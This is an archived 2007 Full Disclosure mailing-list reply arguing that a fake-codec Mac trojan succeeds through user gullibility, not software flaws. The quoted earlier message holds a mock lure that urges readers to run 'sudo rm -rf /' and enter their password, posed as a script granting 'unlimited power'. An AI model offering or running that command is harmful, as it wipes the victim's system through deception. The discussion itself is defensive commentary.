Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: mac trojan in-the-wild
From: Paul Schmehl <pauls () utdallas edu>
Date: Thu, 01 Nov 2007 16:10:49 -0500

--On Thursday, November 01, 2007 13:27:07 -0600 Steven Block 
<scblock () ev-15 com> wrote:

You're an idiot.

Save this as a script and run it, it will give you unlimited power:

# !/bin/sh
sudo rm -rf /

Enter your password if you are prompted.

Oh look, malware.

If you don't think this is an issue, you're not very aware of what's going 
on these days.  The vast majority of present successful attacks on Windows 
are not exploiting vulnerabilities in Windows but taking advantage of the 
gullibility of users.

There is no reason to believe that Mac users will be any less gullible than 
Windows users and plenty of reason to believe they will be less aware of 
the potential pitfalls of social engineering, because, until now, they 
haven't been targeted.

This attack is real and will be successful to the degree that Mac users 
fall for the fake codec scam.  This same scam has worked quite well on 
Windows users and patch level, etc. is irrelevant.  The only chance a 
gullible person has is *if* they are running anti-virus software and *if* 
that software detects this malware and *if* they pay attention to the 
warnings and do not install the "codec".

How many people who own/use Macs even have anti-virus software installed, 
much less up to date?

Yes, *you* might not fall for it.  Plenty of people have and will continue 
to do so, just as they fall for 419 scams and all the other crap the bad 
guys inundate them with.

Judging by the reactions of Mac (and some security) "experts", this attack 
should be wildly successful.

-- 
Paul Schmehl (pauls () utdallas edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault